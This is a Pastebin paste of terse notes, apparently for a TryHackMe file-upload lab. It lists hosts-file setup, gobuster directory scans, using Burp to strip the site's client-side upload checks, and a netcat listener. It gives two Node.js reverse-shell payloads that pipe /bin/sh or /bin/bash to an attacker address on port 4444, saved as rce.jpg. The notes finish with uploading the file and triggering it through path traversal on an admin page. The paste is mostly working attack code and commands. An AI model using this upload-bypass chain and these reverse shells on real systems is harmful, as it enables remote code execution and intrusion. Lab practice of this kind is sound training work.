Combreal

UploadVuln-ch11

Aug 15th, 2021 (edited)
682
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.32 KB | None | 0 0
  1. echo "10.10.XXX.XXX overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm" | sudo tee -a /etc/hosts
  2.  
  3. gobuster dir -u http://jewel.uploadvulns.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  4.  
  5. Delete ^js$ in Burp options
  6. Burp intercept, ctrl+F5 catch upload.js get rid of file checks
  7.  
  8. (function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4444, "10.10.xxx.xxx", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application form crashing })();
  9.  
  10.  
  11. var net = require("net"), sh = require("child_process").exec("/bin/bash");
  12. var client = new net.Socket();
  13. client.connect(4444, "10.9.158.221", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
  14. sh.stderr.pipe(client);});
  15.  
  16. save it as rce.jpg
  17.  
  18. nc -nlvp 4444
  19.  
  20. upload the payload on http://jewel.uploadvulns.thm
  21.  
  22. download UploadVulnsWordlist.txt from task
  23. gobuster dir -u http://jewel.uploadvulns.thm/content -w UploadVulnsWordlist.txt -x jpg
  24.  
  25. uploaded payload name (XXX.jpg) is the 5th that's not ABH/LKG/SAD & YWJ
  26.  
  27. ../content/XXX.jpg on http://jewel.uploadvulns.thm/admin
  28.  
  29. nothing happend in 443 monitor
Add Comment
Please, Sign In to add comment